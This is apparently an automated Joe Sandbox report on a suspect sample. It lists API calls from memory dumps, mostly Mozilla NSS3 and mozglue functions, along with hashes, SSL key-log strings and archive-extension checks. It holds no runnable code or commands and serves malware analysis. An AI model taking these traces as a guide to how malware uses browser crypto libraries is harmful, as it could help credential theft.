                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C,?,-00000001,00000000,?), ref: 6CB02E74
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C,?,-00000001,00000000), ref: 6CB02E88
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB02EC6
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB02EE4
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB02EF8
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB02F62
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB02F86
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB02F9E
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB02FCA
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB0301A
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB0302E
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB03066
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB03085
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB030EC
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB0310C
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB03124
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB0314C
                                                                                                                                                                                                                • Part of subcall function 6CAE9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CB1379E,?,6CAE9568,00000000,?,6CB1379E,?,00000001,?), ref: 6CAE918D
                                                                                                                                                                                                                • Part of subcall function 6CAE9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CB1379E,?,6CAE9568,00000000,?,6CB1379E,?,00000001,?), ref: 6CAE91A0
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0316D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3383223490-0
                                                                                                                                                                                                              • Opcode ID: bf2244442234bf7973e68457333246f7eab4455e36ae4c7e48633ccbea075e6f
                                                                                                                                                                                                              • Instruction ID: 4072280237598cfc76f15534ee9b81ad0ae52879631f19e2ffb0aa0ebbb444b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf2244442234bf7973e68457333246f7eab4455e36ae4c7e48633ccbea075e6f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40F18BB5E002499FDF00DF69D848B9EBBB4FF09318F144169EC04A7611EB31E989CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CB06943
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CB06957
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CB06972
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CB06983
                                                                                                                                                                                                                • Part of subcall function 6CB06910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CB069AA
                                                                                                                                                                                                                • Part of subcall function 6CB06910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CB069BE
                                                                                                                                                                                                                • Part of subcall function 6CB06910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CB069D2
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CB069DF
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CB06A5B
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB06D8C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06DC5
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06DD6
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06DE7
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB06E1F
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06E4B
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06E72
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06EA7
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06EC4
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06ED5
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06EE3
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06EF4
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06F08
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06F35
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06F44
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06F5B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06F65
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB0781D,00000000,6CAFBE2C,?,6CB06B1D,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C40
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB0781D,?,6CAFBE2C,?), ref: 6CB06C58
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C6F
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB06C84
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB06C96
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB06CAA
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06F90
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06FC5
                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6CB06FF4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1304971872-0
                                                                                                                                                                                                              • Opcode ID: 8f2f7d1cf49856750d0e36f5a331105f2c2e46fe07917881d837e346110a5b27
                                                                                                                                                                                                              • Instruction ID: 4b34a3e5c8d079e90f7d03cf03869a4b5e816e4240fadb6c8955fd4c4a0cad9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f2f7d1cf49856750d0e36f5a331105f2c2e46fe07917881d837e346110a5b27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17B149B0F012999FDF01DBA5D845B9EBFB8EF09248F140124EC15E7A41E731E994CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB04C4C
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB04C60
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CA1
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CB04CBE
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CD2
                                                                                                                                                                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04D3A
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04D4F
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04DB7
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB04DD7
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB04DEC
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB04E1B
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB04E2F
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04E5A
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB04E71
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB04E7A
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB04EA2
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB04EC1
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB04ED6
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB04F01
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB04F2A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB56BF7), ref: 6CB56EB6
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: TlsGetValue.KERNEL32(00000040,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1267
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: EnterCriticalSection.KERNEL32(?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB127C
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1291
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: PR_Unlock.NSS3(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB12A0
                                                                                                                                                                                                              • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBFFC0A,6CB56BF7), ref: 6CB56ECD
                                                                                                                                                                                                              • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB56EE0
                                                                                                                                                                                                              • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB56EFC
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CB56F04
                                                                                                                                                                                                              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB56F18
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB56BF7), ref: 6CB56F30
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB56BF7), ref: 6CB56F54
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB56BF7), ref: 6CB56FE0
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB56BF7), ref: 6CB56FFD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB56FF8
                                                                                                                                                                                                              • SSLFORCELOCKS, xrefs: 6CB56F2B
                                                                                                                                                                                                              • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CB56F4F
                                                                                                                                                                                                              • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB56FDB
                                                                                                                                                                                                              • SSLKEYLOGFILE, xrefs: 6CB56EB1
                                                                                                                                                                                                              • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CB56EF7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                              • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5DEC
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CAD5E0F
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CAD5E35
                                                                                                                                                                                                              • SECKEY_CopyPublicKey.NSS3(?), ref: 6CAD5E6A
                                                                                                                                                                                                              • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CAD5EC3
                                                                                                                                                                                                              • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CAD5ED9
                                                                                                                                                                                                              • SECKEY_SignatureLen.NSS3(?), ref: 6CAD5F09
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CAD5F49
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAD5F89
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD5FA0
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAD5FB6
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAD5FBF
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAD600C
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAD6079
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAD6084
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAD6094
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,762283C0,00000000,0093C6EC,?), ref: 0093BA06
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,0095613C), ref: 0093BA34
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.zip), ref: 0093BA44
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.zoo), ref: 0093BA50
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.arc), ref: 0093BA5C
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.lzh), ref: 0093BA68
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.arj), ref: 0093BA74
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.gz), ref: 0093BA80
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(762283C0,.tgz), ref: 0093BA8C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                                              • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000080), ref: 6CBD9C70
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9C85
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000), ref: 6CBD9C96
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CAB21BC), ref: 6CAABB8C
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9CA9
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CB89946
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA416B7,00000000), ref: 6CB8994E
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: free.MOZGLUE(00000000), ref: 6CB8995E
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9CB9
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CBD9CC9
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(00000000), ref: 6CBD9CDA
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CAABBEB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CAABBFB
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: GetLastError.KERNEL32 ref: 6CAABC03
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CAABC19
                                                                                                                                                                                                                • Part of subcall function 6CAABB80: free.MOZGLUE(00000000), ref: 6CAABC22
                                                                                                                                                                                                              • PR_NewCondVar.NSS3(?), ref: 6CBD9CF0
                                                                                                                                                                                                              • PR_NewPollableEvent.NSS3 ref: 6CBD9D03
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_CallOnce.NSS3(6CC214B0,6CBCF510), ref: 6CBCF3E6
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_CreateIOLayerStub.NSS3(6CC2006C), ref: 6CBCF402
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_Malloc.NSS3(00000004), ref: 6CBCF416
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CBCF42D
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_SetSocketOption.NSS3(?), ref: 6CBCF455
                                                                                                                                                                                                                • Part of subcall function 6CBCF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CBCF473
                                                                                                                                                                                                                • Part of subcall function 6CB89890: TlsGetValue.KERNEL32(?,?,?,6CB897EB), ref: 6CB8989E
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBD9D78
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6CBD9DAF
                                                                                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6CBD9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBD9D9F
                                                                                                                                                                                                                • Part of subcall function 6CAAB3C0: TlsGetValue.KERNEL32 ref: 6CAAB403
                                                                                                                                                                                                                • Part of subcall function 6CAAB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CAAB459
                                                                                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6CBDA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBD9DE8
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6CBD9DFC
                                                                                                                                                                                                              • _PR_CreateThread.NSS3(00000000,6CBDA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CBD9E29
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,0000000C), ref: 6CBD9E3D
                                                                                                                                                                                                              • _PR_MD_UNLOCK.NSS3(?), ref: 6CBD9E71
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CBD9E89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4254102231-0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB8CC7B), ref: 6CB8CD7A
                                                                                                                                                                                                                • Part of subcall function 6CB8CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CAFC1A8,?), ref: 6CB8CE92
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB8CDA5
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB8CDB8
                                                                                                                                                                                                              • PR_UnloadLibrary.NSS3(00000000), ref: 6CB8CDDB
                                                                                                                                                                                                              • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB8CD8E
                                                                                                                                                                                                                • Part of subcall function 6CAB05C0: PR_EnterMonitor.NSS3 ref: 6CAB05D1
